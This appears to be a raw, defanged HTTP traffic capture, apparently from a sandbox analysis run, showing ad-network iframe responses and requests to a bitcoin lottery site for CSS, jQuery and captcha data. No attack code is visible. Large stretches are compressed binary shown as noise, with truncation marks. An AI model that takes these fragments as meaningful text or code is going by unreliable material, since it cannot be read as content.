User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; SV1; chromeframe/22.0.1229.94; .NET CLR 2.0.50727)

Host: ads.trafficjunky.net

Connection: Keep-Alive


HTTP/1.1 200 OK

Date: Fri, 20 Jan 2017 09:55:05 GMT

Content-Type: text/html

Content-Length: 1691

Connection: close

Cache-Control: private, no-cache, no-cache, proxy-revalidate

Server: Logger/0.1

Set-Cookie: tj_UUID=48a9dec2-af58-42f3-8797-50cf1a156d48; domain=.trafficjunky.net; path=/; Expires=Mon Jan 15 04:55:05 2018

Access-Control-Allow-Origin: *

Access-Control-Allow-Credentials: true

Access-Control-Allow-Methods: GET,POST

Access-Control-Allow-Headers: Content-Type

Access-Control-Max-Age: 86400
<HTML><HEAD><script type="text/javascript"> var MAXI
MUM_DEPTH = 10;function mouseover(self){for(var i = 0; i < MAXIMUM_
DEPTH; i  ){var parent = getParent(window.parent, i);parent.postMessag
e({event: "mouseover", click_url:self.attributes.click_url.value}, "*"
);}}function mouseout(self){for(var i = 0; i < MAXIMUM_DEPTH; i  ){
var parent = getParent(window.parent, i);parent.postMessage({event:"mo
useout"}, "*");}}function getParent(e, i){if( i == 0){return e;}return
 getParent(e.parent, i - 1);}</script><TITLE>Ad delivery s
ystem</TITLE><meta name="keywords" content="1000232241" def="
1" z_id="1319961" ad_id="1189078351" qw="0" isave="yes" /> <meta
 name="description" content="" /> <style type="text/css"><
!-- a img   { border: 0; } body    { margin: 0; padding: 0; text-align
: center;} --> </style> </HEAD><BODY style="backgrou
nd-color:transparent;"><iframe onmouseover="mouseover(this);" on
mouseout="mouseout(this)" id="1319961_1484906105" name="1319961_148490
6105" src="hXXp://ads2.contentabc.com/ads?spot_id=2007013&rand=1853651
284&impid=56_1484906105906078_12799&uuid=48a9dec2-af58-42f3-8797-50cf1
a156d48" width="300" height="250" scrolling="no" frameborder="0" allow
transparency="true" marginwidth="0" marginheight="0" z_id="1319961" c_
id="1000232241"  ad_id="1189078351" def="1" qw="0" click_url="hXXp://a
ds.trafficjunky.net/click?url=iframe-click&click_data=QAAAAOQlAAB5
3oFYAAAAAAAAAAAZJBQAGSQUAAAAAAAxVZ47T-XfRs1OijwAAAAAAAAAAAABAAAAAA<<< skipped >>>

GET /ads?spot_id=2007013&rand=1853651284&impid=56_1484906106582962_12796&uuid=b3da0bc7-5356-4cf4-8cd7-941025e2cf15 HTTP/1.1

Accept: image/jpeg, application/x-ms-application, image/gif, application/xaml xml, image/pjpeg, application/x-ms-xbap, */*

Referer: hXXp://ads.trafficjunky.net/ads?zone_id=1344031&ref=freemomboy.com&pid=60e5644c-fd9a-44a6-a46b-49c04e3effcd&ts=1484906106

Accept-Language: en-US

Accept-Encoding: gzip, deflate

User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; SV1; chromeframe/22.0.1229.94; .NET CLR 2.0.50727)

Host: ads2.contentabc.com

Connection: Keep-Alive

Cookie: adtools_fc=siteAllocID_266580_expires_1484906106|


HTTP/1.1 200 OK

Content-Type: text/html

Transfer-Encoding: chunked

Connection: close

Date: Fri, 20 Jan 2017 04:55:06 GMT

Access-Control-Allow-Origin: *

Access-Control-Allow-Methods: GET,POST

Access-Control-Allow-Headers: Content-Type

Access-Control-Max-Age: 86400

Cache-Control: private, no-cache, no-cache, proxy-revalidate

Set-Cookie: adtools_fc=siteAllocID_266580_expires_1484906106|; expires=Sun Feb 19 04:55:06 201

Server: Logger/0.1

Content-Encoding: gzip
32a.............T[..8.. .....&...I.U4...v...e....p...1C2.....>..JE.
......9.wDV..(j.....'..vq.........:..g...o.....Zs...6...Zv.. ....?.w..
....Y0G...D=C......*....^...N.....CRT.U.... ..HE.....5.}e&F...U.N.O.A.
`.../LJF.4..4,.A..I..Qv..4.1.#-Mq&GoR.b.PZ.".qU.PW..*..w......7.65.|R.
..Fv:.&.'l...#==4....>.O......*}Z...u.|.{..;Z....#`...y.jWb..w.....
..Q.M./C-......K....\.=?.$y......`uPu.......C.G..9=b..(.8..G...p.....l
[....}2..y.C.e.;.t.Eg43L...g....P.2..2..O....]..,1uD........f....sf...
%....)..... ..Y..I.eS{.k.r1.....$i.N.i..a.&Y..Q.F7y:.jS.....k.S..?.=t.
s..if(..u.....13.%.S...;C.rl. ........L...H.R.......B.E......oZ.;.>
.T0.6 .[..^..0..h.'..-..F....*..ih.qE.(....l* N...?lK...i.g......o...%
j.R..g..K..k.8G....5CLp.....j...!....v.....J.C..T...:.;y.8......^../..
AM=d...n|....<h.7.t.A.~.....=......k.o....v.....c.d.....0..

GET /ads?spot_id=2007013&rand=1853651284&impid=53_1484906106522410_29323&uuid=b3da0bc7-5356-4cf4-8cd7-941025e2cf15 HTTP/1.1

Accept: image/jpeg, application/x-ms-application, image/gif, application/xaml xml, image/pjpeg, application/x-ms-xbap, */*

Referer: hXXp://ads.trafficjunky.net/ads?zone_id=1344011&ref=freemomboy.com&pid=60e5644c-fd9a-44a6-a46b-49c04e3effcd&ts=1484906106

Accept-Language: en-US

Accept-Encoding: gzip, deflate

User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; SV1; chromeframe/22.0.1229.94; .NET CLR 2.0.50727)

Host: ads2.contentabc.com

Connection: Keep-Alive

Cookie: adtools_fc=siteAllocID_266580_expires_1484906106|


HTTP/1.1 200 OK

Content-Type: text/html

Transfer-Encoding: chunked

Connection: close

Date: Fri, 20 Jan 2017 04:55:06 GMT

Access-Control-Allow-Origin: *

Access-Control-Allow-Methods: GET,POST

Access-Control-Allow-Headers: Content-Type

Access-Control-Max-Age: 86400

Cache-Control: private, no-cache, no-cache, proxy-revalidate

Set-Cookie: adtools_fc=siteAllocID_266580_expires_1484906106|; expires=Sun Feb 19 04:55:06 201

Server: Logger/0.1

Content-Encoding: gzip
38d.............U.n.6...VE...-K....R.Iv...R./}"h...S$..";_.C...o...,..
p.g.......G.k.....).Z7.QT.....Q...".Z.u..4;...%...-....b.BKm...i..PCm%
.r.B.2&T.D..Xa.....m......V...m..*.(.y...t?.....k..2...8K.R./...'.;.H.
.'eD.|.......E..I.g.....o'..j.....V<?i..Y......3|}.~...... ....JX9)
t........D]{.o.........n..O/.=n...M.....7...../......,y.n....O/w..o0..
tN]..S..{.....l.l?.....,#...9e.h5."..%..6N......u\.....<(...:..3..o
...n].i.3...mI.(I.....3p.fT..pB....k.?ly....I....N..p../AP...$L.).`.H.
.U$DH..}b.s...&..R(*...B....0J$LRE.N..r.f..^..Y....a&.>.n{.[A....7.
E."...ArN..Od......uPp..:....T ....?.!...R..R...<K.........G.10..&.
l..5...4.%S.^.............J..._E..~.`.^"<.....\T.[.4.?.nC...rI.x. T
t..,5Z(....WnK..%..c\.3.....t.j.9....*{........@Y~..3.....Pk.<..j..
u?.....c`...t.)k..$....&..............=....o....5....b.503K$...2.I]..Z
1.....Z.1A...@.I.....b.&..`...".....g..."...iA.....#(Ttjt.A.~...v..&.u
.................Z......0..

GET /Public/css/core.css HTTP/1.1

Accept: */*

Referer: hXXp://coinsns.com/index.php?s=/lottery/index/index.html

Accept-Language: en-US

Accept-Encoding: gzip, deflate

User-Agent: Mozilla/5.0 (Windows NT 6.3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.87 Safari/537.36 QQBrowser/9.2.5204.400

Host: coinsns.com

Connection: Keep-Alive

Cookie: PHPSESSID=85qj3gnsemli6jrglevvlkh104


HTTP/1.1 200 OK

Server: nginx/1.0.15

Date: Fri, 20 Jan 2017 09:55:15 GMT

Content-Type: text/css

Transfer-Encoding: chunked

Connection: keep-alive

Last-Modified: Mon, 11 Jan 2016 11:57:41 GMT

ETag: "a5a21d-9aa4-5290da4dfd740"

Content-Encoding: gzip
23f2.............=k.c.q..W(...oq..}..T....|H*....O.#...x%......*....`.
.8...qALq.P.....]>./.{.{..q.... ...E.33=3=...."....e.=i...V.?^..
'.{.{...my...?p...n..z............/..._......u....O.a5.U.l0..w....d...
\...|t.:..?f....kM.|T,S..Z.j..V...@.ch..V.p]V...v...Z\.:1.........Z...
@.X.|....[..}.L.6..u..d.w.4.#2..8....n....Z..Y6-.E.u............1....`
.V........|.8./..o......."_^....d..g.........G5w@Pz.w8.lR`......'.^..3
.D................w^....W..w..7.........{../....?..........?...o......
...d.Cp.[...T.gB.>.....zZ..........ga3....Q.Y!-..cX..G...g..h.a[.*.
.i..>...`......P...i<.....[.F......7S...~.'....ct..N..X......'.1
..?9~.....;}8.....s.(... .....^......`.=...e;.(.T..N.........'i....y..
.....k'B(.k9C..Qk...`&....w..I*.c.=...7.w,......i.N9[T.u>...ANm..8.
 .&?..._......ti..u...K..de...R.....g..z...RWD9....8.iB.Nm.j.vT..k....
. }.....j3........O..e6*..fJR.V..N.u.....'G.......I.0.....T...x.......
I.t.|...j.Y..tZ"......X.Z...YJ.".....X...9..s.......Z..=W\..;..m.V....
sI`\HevD.Z~....y...,.9.......]{D.....s.........N..#..........hr04.H.e.
q..[e].....9..G...{{.....g.m..=wo...^....W3...U.......o..x `.[......V.
.!..|/`.{.p6.`.[........V.......0....o...B.........`......[....0....o.
.x `.[.....8.....x.C..@.....(6S-..jf,...F........@?%."...$.Uw/Z.r;6...
.`...q..d..7.*.I.&......c-..}....e;.h....lV.G.=.k.N0'3..;..E.*.Hy.....
8``.1..Y...h=!H.e...7...n..b3.f..0*W.i..E...T...r.f.g.Q>.C.!nmm....
.M.Z...7s]u.........nf.....-dNT..D...=.....9..B>...EW.B.'........S/
2.I..QuAgo[.g...b??^mH~Z...Y>-/.M..|],...........@.N...P.b..!..<<< skipped >>>

GET /Public/js.php?f=js/jquery-2.0.3.min.js,js/com/com.functions.js,js/core.js,js/com/com.toast.class.js,js/com/com.ucard.js HTTP/1.1

Accept: */*

Referer: hXXp://coinsns.com/index.php?s=/lottery/index/index.html

Accept-Language: en-US

Accept-Encoding: gzip, deflate

User-Agent: Mozilla/5.0 (Windows NT 6.3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.87 Safari/537.36 QQBrowser/9.2.5204.400

Host: coinsns.com

Connection: Keep-Alive

Cookie: PHPSESSID=85qj3gnsemli6jrglevvlkh104


HTTP/1.1 200 OK

Server: nginx/1.0.15

Date: Fri, 20 Jan 2017 09:55:15 GMT

Content-Type: application/x-javascript; charset: utf-8

Transfer-Encoding: chunked

Connection: keep-alive

X-Powered-By: PHP/5.3.14

cache-control: max-age=604800

Last-Modified: Fri, 20 Jan 2017 09:55:15GMT

Pragma: max-age=604800

Expires: Fri, 27 Jan 2017 09:55:15 GMT

Etag: 1484906115||L1B1YmxpYy9qcy5waHA/Zj1qcy9qcXVlcnktMi4wLjMubWluLmpzLGpzL2NvbS9jb20uZnVuY3Rpb25zLmpzLGpzL2NvcmUuanMsanMvY29tL2NvbS50b2FzdC5jbGFzcy5qcyxqcy9jb20vY29tLnVjYXJkLmpz
bde8..(function(e,undefined){var t,n,r=typeof undefined,i=e.location,o
=e.document,s=o.documentElement,a=e.jQuery,u=e.$,l={},c=[],p="2.0.3",f
=c.concat,h=c.push,d=c.slice,g=c.indexOf,m=l.toString,y=l.hasOwnProper
ty,v=p.trim,x=function(e,n){return new x.fn.init(e,n,t)},b=/[ -]?(?:\d
*\.|)\d (?:[eE][ -]?\d |)/.source,w=/\S /g,T=/^(?:\s*(<[\w\W] >)
[^>]*|#([\w-]*))$/,C=/^<(\w )\s*\/?>(?:<\/\1>|)$/,k=/^-
ms-/,N=/-([\da-z])/gi,E=function(e,t){return t.toUpperCase()},S=functi
on(){o.removeEventListener("DOMContentLoaded",S,!1),e.removeEventListe
ner("load",S,!1),x.ready()};x.fn=x.prototype={jquery:p,constructor:x,i
nit:function(e,t,n){var r,i;if(!e)return this;if("string"==typeof e){i
f(r="<"===e.charAt(0)&&">"===e.charAt(e.length-1)&&e.length>=
3?[null,e,null]:T.exec(e),!r||!r[1]&&t)return!t||t.jquery?(t||n).find(
e):this.constructor(t).find(e);if(r[1]){if(t=t instanceof x?t[0]:t,x.m
erge(this,x.parseHTML(r[1],t&&t.nodeType?t.ownerDocument||t:o,!0)),C.t
est(r[1])&&x.isPlainObject(t))for(r in t)x.isFunction(this[r])?this[r]
(t[r]):this.attr(r,t[r]);return this}return i=o.getElementById(r[2]),i
&&i.parentNode&&(this.length=1,this[0]=i),this.context=o,this.selector
=e,this}return e.nodeType?(this.context=this[0]=e,this.length=1,this):
x.isFunction(e)?n.ready(e):(e.selector!==undefined&&(this.selector=e.s
elector,this.context=e.context),x.makeArray(e,this))},selector:"",leng
th:0,toArray:function(){return d.call(this)},get:function(e){return nu
ll==e?this.toArray():0>e?this[this.length e]:this[e]},pushStack<<< skipped >>>

GET /Public/js/ext/atwho/atwho.css HTTP/1.1

Accept: */*

Referer: hXXp://coinsns.com/index.php?s=/lottery/index/index.html

Accept-Language: en-US

Accept-Encoding: gzip, deflate

User-Agent: Mozilla/5.0 (Windows NT 6.3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.87 Safari/537.36 QQBrowser/9.2.5204.400

Host: coinsns.com

Connection: Keep-Alive

Cookie: PHPSESSID=85qj3gnsemli6jrglevvlkh104


HTTP/1.1 200 OK

Server: nginx/1.0.15

Date: Fri, 20 Jan 2017 09:55:17 GMT

Content-Type: text/css

Connection: keep-alive

Last-Modified: Mon, 11 May 2015 15:34:58 GMT

ETag: "a5a254-320-515d01ed1cc80"

Accept-Ranges: bytes

Content-Length: 800
.atwho-view {..    position: absolute;..    top: 0;..    left: 0;..   
 display: none;..    margin-top: 18px;..    background: #fff;..    bor
der: 1px solid #DDD;..    border-radius: 3px;..    box-shadow: 0 0 5px
 rgba(0, 0, 0, .1);..    min-width: 120px;..    z-index: 9999999..}...
atwho-view .cur {..    background: #36F;..    color: #fff..}...atwho-v
iew .cur small {..    color: #fff..}...atwho-view strong {..    color:
 #36F..}...atwho-view .cur strong {..    color: #fff;..    font: bold.
.}...atwho-view ul {..    list-style: none;..    padding: 0;..    marg
in: auto..}...atwho-view ul li {..    display: block;..    padding: 5p
x 10px;..    border-bottom: 1px solid #DDD;..    cursor: pointer..}...
atwho-view small {..    font-size: smaller;..    color: #777;..    fon
t-weight: 400..}....


GET /Application/Lottery/Static/js/radialIndicator.min.js HTTP/1.1

Accept: */*

Referer: hXXp://coinsns.com/index.php?s=/lottery/index/index.html

Accept-Language: en-US

Accept-Encoding: gzip, deflate

User-Agent: Mozilla/5.0 (Windows NT 6.3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.87 Safari/537.36 QQBrowser/9.2.5204.400

Host: coinsns.com

Connection: Keep-Alive

Cookie: PHPSESSID=85qj3gnsemli6jrglevvlkh104


HTTP/1.1 200 OK

Server: nginx/1.0.15

Date: Fri, 20 Jan 2017 09:55:18 GMT

Content-Type: application/javascript

Connection: keep-alive

Last-Modified: Sat, 14 Feb 2015 23:59:40 GMT

ETag: "aae4dc-f6f-50f15256a3300"

Accept-Ranges: bytes

Content-Length: 3951
/*.    radialIndicator.js v 1.0.0.    Author: Sudhanshu Yadav.    Copy
right (c) 2015 Sudhanshu Yadav - ignitersworld.com , released under th
e MIT license..    Demo on: ignitersworld.com/lab/radialIndicator.html
.*/.!function(t,e,n){"use strict";function r(t){var e=/^#?([a-f\d])([a
-f\d])([a-f\d])$/i;t=t.replace(e,function(t,e,n,r){return e e n n r r}
);var n=/^#?([a-f\d]{2})([a-f\d]{2})([a-f\d]{2})$/i.exec(t);return n?[
parseInt(n[1],16),parseInt(n[2],16),parseInt(n[3],16)]:null}function i
(t,e,n,r){return Math.round(n (r-n)*t/e)}function a(t,e,n,a,o){var u=-
1!=o.indexOf("#")?r(o):o.match(/\d /g),l=-1!=a.indexOf("#")?r(a):a.mat
ch(/\d /g),s=n-e,h=t-e;return u&&l?"rgb(" i(h,s,l[0],u[0]) "," i(h,s,l
[1],u[1]) "," i(h,s,l[2],u[2]) ")":null}function o(){for(var t=argumen
ts,e=t[0],n=1,r=t.length;r>n;n  ){var i=t[n];for(var a in i)i.hasOw
nProperty(a)&&(e[a]=i[a])}return e}function u(t){return function(e){if
(!t)return e.toString();e=e||0;for(var n=e.toString().split("").revers
e(),r=t.split("").reverse(),i=0,a=0,o=r.length;o>i&&n.length;i  )"#
"==r[i]&&(a=i,r[i]=n.shift());return r.splice(a 1,r.lastIndexOf("#")-a
,n.reverse().join("")),r.reverse().join("")}}function l(t,e){e=e||{},e
=o({},s.defaults,e),this.indOption=e,"string"==typeof t&&(t=n.querySel
ector(t)),t.length&&(t=t[0]),this.container=t;var r=n.createElement("c
anvas");t.appendChild(r),this.canElm=r,this.ctx=r.getContext("2d"),thi
s.current_value=e.initValue||e.minValue||0}function s(t,e){var n=new l
(t,e);return n.init(),n}var h=2*Math.PI,f=Math.PI/2;l.prototype={c<<< skipped >>>

GET /index.php?s=/lottery/index/btc_rate.html HTTP/1.1

X-Requested-With: XMLHttpRequest

Accept: */*

Referer: hXXp://coinsns.com/index.php?s=/lottery/index/index.html

Accept-Language: en-us

Accept-Encoding: gzip, deflate

User-Agent: Mozilla/5.0 (Windows NT 6.3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.87 Safari/537.36 QQBrowser/9.2.5204.400

Host: coinsns.com

Connection: Keep-Alive

Cookie: PHPSESSID=85qj3gnsemli6jrglevvlkh104; _ga=GA1.2.150513197.1484906118; _gat=1


HTTP/1.1 200 OK

Server: nginx/1.0.15

Date: Fri, 20 Jan 2017 09:55:23 GMT

Content-Type: text/html

Connection: keep-alive

X-Powered-By: PHP/5.3.14

Expires: Thu, 19 Nov 1981 08:52:00 GMT

Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0

Pragma: no-cache

Content-Length: 0

HTTP/1.1 200 OK..Server: nginx/1.0.15..Date: Fri, 20 Jan 2017 09:55:23
 GMT..Content-Type: text/html..Connection: keep-alive..X-Powered-By: P
HP/5.3.14..Expires: Thu, 19 Nov 1981 08:52:00 GMT..Cache-Control: no-s
tore, no-cache, must-revalidate, post-check=0, pre-check=0..Pragma: no
-cache..Content-Length: 0......

GET /index.php?s=/lottery/index/verifygee/rand/IJnCjr0h.html HTTP/1.1

X-Requested-With: XMLHttpRequest

Accept: application/json, text/javascript, */*; q=0.01

Referer: hXXp://coinsns.com/index.php?s=/lottery/index/index.html

Accept-Language: en-us

Accept-Encoding: gzip, deflate

User-Agent: Mozilla/5.0 (Windows NT 6.3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.87 Safari/537.36 QQBrowser/9.2.5204.400

Host: coinsns.com

Connection: Keep-Alive

Cookie: PHPSESSID=85qj3gnsemli6jrglevvlkh104; _ga=GA1.2.150513197.1484906118; _gat=1


HTTP/1.1 200 OK

Server: nginx/1.0.15

Date: Fri, 20 Jan 2017 09:55:34 GMT

Content-Type: text/html

Connection: keep-alive

X-Powered-By: PHP/5.3.14

Expires: Thu, 19 Nov 1981 08:52:00 GMT

Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0

Pragma: no-cache

Content-Length: 100

{"success":1,"gt":"3386e03c620a4067f18fa92c370f1594","challenge":"7063
5a5a34b073f557c9bcaabf1c81ec"}HTTP/1.1 200 OK..Server: nginx/1.0.15..D
ate: Fri, 20 Jan 2017 09:55:34 GMT..Content-Type: text/html..Connectio
n: keep-alive..X-Powered-By: PHP/5.3.14..Expires: Thu, 19 Nov 1981 08:
52:00 GMT..Cache-Control: no-store, no-cache, must-revalidate, post-ch
eck=0, pre-check=0..Pragma: no-cache..Content-Length: 100..{"success":
1,"gt":"3386e03c620a4067f18fa92c370f1594","challenge":"70635a5a34b073f
557c9bcaabf1c81ec"}..

GET /ads?zone_id=1344041&ref=freemomboy.com&pid=60e5644c-fd9a-44a6-a46b-49c04e3effcd&ts=1484906106 HTTP/1.1

Accept: image/jpeg, application/x-ms-application, image/gif, application/xaml xml, image/pjpeg, application/x-ms-xbap, */*

Accept-Language: en-US

Accept-Encoding: gzip, deflate

User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; SV1; chromeframe/22.0.1229.94; .NET CLR 2.0.50727)

Host: ads.trafficjunky.net

Connection: Keep-Alive

Cookie: tj_UUID=b3da0bc7-5356-4cf4-8cd7-941025e2cf15


HTTP/1.1 200 OK

Date: Fri, 20 Jan 2017 09:55:06 GMT

Content-Type: text/html

Content-Length: 1689

Connection: close

Cache-Control: private, no-cache, no-cache, proxy-revalidate

Server: Logger/0.1

Set-Cookie: tj_UUID=b3da0bc7-5356-4cf4-8cd7-941025e2cf15; domain=.trafficjunky.net; path=/; Expires=Mon Jan 15 04:55:06 2018

Access-Control-Allow-Origin: *

Access-Control-Allow-Credentials: true

Access-Control-Allow-Methods: GET,POST

Access-Control-Allow-Headers: Content-Type

Access-Control-Max-Age: 86400
<HTML><HEAD><script type="text/javascript"> var MAXI
MUM_DEPTH = 10;function mouseover(self){for(var i = 0; i < MAXIMUM_
DEPTH; i  ){var parent = getParent(window.parent, i);parent.postMessag
e({event: "mouseover", click_url:self.attributes.click_url.value}, "*"
);}}function mouseout(self){for(var i = 0; i < MAXIMUM_DEPTH; i  ){
var parent = getParent(window.parent, i);parent.postMessage({event:"mo
useout"}, "*");}}function getParent(e, i){if( i == 0){return e;}return
 getParent(e.parent, i - 1);}</script><TITLE>Ad delivery s
ystem</TITLE><meta name="keywords" content="1000232241" def="
1" z_id="1344041" ad_id="1189078351" qw="0" isave="yes" /> <meta
 name="description" content="" /> <style type="text/css"><
!-- a img   { border: 0; } body    { margin: 0; padding: 0; text-align
: center;} --> </style> </HEAD><BODY style="backgrou
nd-color:transparent;"><iframe onmouseover="mouseover(this);" on
mouseout="mouseout(this)" id="1344041_1484906106" name="1344041_148490
6106" src="hXXp://ads2.contentabc.com/ads?spot_id=2007013&rand=1853651
284&impid=52_1484906106682039_8221&uuid=b3da0bc7-5356-4cf4-8cd7-941025
e2cf15" width="300" height="250" scrolling="no" frameborder="0" allowt
ransparency="true" marginwidth="0" marginheight="0" z_id="1344041" c_i
d="1000232241"  ad_id="1189078351" def="1" qw="0" click_url="hXXp://ad
s.trafficjunky.net/click?url=iframe-click&click_data=QAAAAOQlAAB63
oFYAAAAAAAAAAApghQAKYIUAAAAAAAxVZ47T-XfRs1OijwAAAAAAAAAAAABAAAAAAA<<< skipped >>>

GET /Public/js/ext/magnific/magnific-popup.css HTTP/1.1

Accept: */*

Referer: hXXp://coinsns.com/index.php?s=/lottery/index/index.html

Accept-Language: en-US

Accept-Encoding: gzip, deflate

User-Agent: Mozilla/5.0 (Windows NT 6.3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.87 Safari/537.36 QQBrowser/9.2.5204.400

Host: coinsns.com

Connection: Keep-Alive

Cookie: PHPSESSID=85qj3gnsemli6jrglevvlkh104


HTTP/1.1 200 OK

Server: nginx/1.0.15

Date: Fri, 20 Jan 2017 09:55:15 GMT

Content-Type: text/css

Transfer-Encoding: chunked

Connection: keep-alive

Last-Modified: Mon, 11 May 2015 15:34:58 GMT

ETag: "a5a261-1fd6-515d01ed1cc80"

Content-Encoding: gzip
88e.............Y...6.}...`...YD..k...zy.P4..J.mv%Q.......9CjHQNS...5I
....33.8...]........._.|.g.._.7..(w......M......ZmG........\.......=..
..B...dGn......mm..b.7......z..]..~R.7V..~..C.Y..Ui..A' =>......V..
..B..^.....W.>..^...<...~W.^....Z.j-Z.*..n:........*..X..me...=.
R..:..&se.Q.f=....B.z.j.T.wN...`.....WM.......F.;P...=.b..b./n.4.F.Eih
Ic^.......e....^......k....e.....-.Z5.em..........WY..V ..N...]8_...$.
'Z...I4.sr.^.r..h.eq....5..i..J..h.>#3......u.%#..M.&...z|..._...L.
]R....`l|Yi....0I..U]ov............I.>.B.F.T,Um....{a..?..........L
|;..nt......*..a..w..qe....A..Eb.R.WV..h}o......H.....&..p3.....:.ZU.?
.{...:?5.e...A.;Sm...#t1>...x....l.p#...u...}.....[..r.l.0.........
.j..y.....O.m7....9I.Qv.Z...x.|..d....=.5`8..P.Jn....a.......s..#.a.M.
0.>.F..<.sboG]..< :.@...^.C'{@ .vG.>...*.NIXY.{..:!}D.....
f.x7g.....#D..&>hU.._.].lMu. ...'.N...6........O.......D*...cb6....
.FU.....T.!....,...=.J...K...t...Y...<.].%e@..0>...}#k6._`..G.[.
..........._.p...]....i..O.AAq...#....q..1.nx.N_..!].d1.[V...VN..p...E
9...........'..<..5....2........;....... h._..>....,x!s..!...|..
.....<..RD...,.....r.)h<gDdp{K.%.N....=.:!.<... ..w.-......])
OW........:v.X&...;....8.=<.w.....k.........!..q...j...n".M%.....q.
.........E.0.>l..w.6..@i1.Qp..).A...T......kr,.~P-..4.y'...B.%...&l
t;H........%.?.....0...j....c...d.(.$.........J.t...k..<.r...soeG..
H.)..jr....r5.rr....&.R.6 .L.83.....6P....O.D l.h....A.&u..uLHX.b...v.
A...g...L.....F.X.#@Z.Z.x.q.ieO..!.).P.Nf.x$....../5PP.|.........M<<< skipped >>>

GET /Application/Lottery/Static/css/lottery.css HTTP/1.1

Accept: */*

Referer: hXXp://coinsns.com/index.php?s=/lottery/index/index.html

Accept-Language: en-US

Accept-Encoding: gzip, deflate

User-Agent: Mozilla/5.0 (Windows NT 6.3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.87 Safari/537.36 QQBrowser/9.2.5204.400

Host: coinsns.com

Connection: Keep-Alive

Cookie: PHPSESSID=85qj3gnsemli6jrglevvlkh104


HTTP/1.1 200 OK

Server: nginx/1.0.15

Date: Fri, 20 Jan 2017 09:55:15 GMT

Content-Type: text/css

Transfer-Encoding: chunked

Connection: keep-alive

Last-Modified: Fri, 25 Mar 2016 12:18:58 GMT

ETag: "aae4d3-5722-52ede913f1080"

Content-Encoding: gzip
65c.............\.n.:...SX.V.J.r`a[............B..............C!..[A.3
....7......|kI...:.....Wo.m..._..o......a./}C.n....p.%..h.....B.>.a
V.....7........?G...CD....^.Q(..-.._...hA....$ ...<....NxA. Y.t{..A
.....L.'.OD..s..eO`...o...Z.....,.{;.-..F.._.q...:....].....I.o.e..8..
...0o.....G......]..R6.;.r..Y.0...tO.^..g3.wx...............Gt.....)..
h..$.J.,|.....X.@:..pM...J........R1.aq....e.....#kG.....I`....?.....G
.....>.?..*#UOU....>Ng..0.c2y.j...^V.K.....=....-..%6..xlO.. ..X
.-....}.<.....*..c.........."....g.*.a..l.sg...G.. .j..T..h.......d
Z...X.0....G.V.........S..g.9.P.......?.2........h......N.W.b...M.o...
..R...B)b..o .........3.D%..^........5...[p.....H|~ ...D......o...B.;[
.*.Wl14L.3L*..i*v%....AI]i!.R.FB.......@V.5...J~..qG^9c-w}.L.0.tF,z...
.:.*'.  >/.-..qQ...;..,.V..>..A....Y..d......z...g.Y..d.....M.=Q
.........w.M#.'...U.R.I.;.a..(.5L(. ..(..:&...1 ILSjk.....7dE_.....'..
..r7.N.Q..G.....T......T..Tv..L.y....E.o.................j..~.r..%..q?
..^..?[.j.....>....?...\.?/i...~.^...1N..\(BQ.*.T.S.OOO.x{|ku.".b..
g.q.8|....8..lEN.Pk....1.. 3.3....>"..c.b..d.......17...Z..Xr..Y.\.
Y..8.....L..v..05.Ij$..%w..<..............S7v0;.S..YW......\2.*j...
#..3{..fR....Rv*.y.<...B..g.`......M....(...V.....%^..'....N...q...
.$.4......k...,oG..`YG..*O=..&.Ci...q9.|...D....d.%)I....8j..G..i.CTs.
T........Z..6.....,..r.z.\.n(.Un..XD..?)..L.S~)C.......=.*...N..biT...
.......c..`r.....=w']......ns.......... ..kV.V.^.a..T0...2....W.*.....
...F4.h$.7..e..(#.A....<..%ie..tOZIm..c..^..nM.*M....i.&...y.EO<<< skipped >>>

GET /index.php?s=/lottery/index/verifygee/rand/J3g0ttxl.html HTTP/1.1

X-Requested-With: XMLHttpRequest

Accept: application/json, text/javascript, */*; q=0.01

Referer: hXXp://coinsns.com/index.php?s=/lottery/index/index.html

Accept-Language: en-us

Accept-Encoding: gzip, deflate

User-Agent: Mozilla/5.0 (Windows NT 6.3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.87 Safari/537.36 QQBrowser/9.2.5204.400

Host: coinsns.com

Connection: Keep-Alive

Cookie: PHPSESSID=85qj3gnsemli6jrglevvlkh104


HTTP/1.1 200 OK

Server: nginx/1.0.15

Date: Fri, 20 Jan 2017 09:55:17 GMT

Content-Type: text/html

Connection: keep-alive

X-Powered-By: PHP/5.3.14

Expires: Thu, 19 Nov 1981 08:52:00 GMT

Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0

Pragma: no-cache

Content-Length: 100

{"success":1,"gt":"3386e03c620a4067f18fa92c370f1594","challenge":"7185
e65f5aea0024bf35c5c1275d75da"}HTTP/1.1 200 OK..Server: nginx/1.0.15..D
ate: Fri, 20 Jan 2017 09:55:17 GMT..Content-Type: text/html..Connectio
n: keep-alive..X-Powered-By: PHP/5.3.14..Expires: Thu, 19 Nov 1981 08:
52:00 GMT..Cache-Control: no-store, no-cache, must-revalidate, post-ch
eck=0, pre-check=0..Pragma: no-cache..Content-Length: 100..{"success":
1,"gt":"3386e03c620a4067f18fa92c370f1594","challenge":"7185e65f5aea002
4bf35c5c1275d75da"}....

GET /Public/static/jquery.iframe-transport.js HTTP/1.1

Accept: */*

Referer: hXXp://coinsns.com/index.php?s=/lottery/index/index.html

Accept-Language: en-US

Accept-Encoding: gzip, deflate

User-Agent: Mozilla/5.0 (Windows NT 6.3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.87 Safari/537.36 QQBrowser/9.2.5204.400

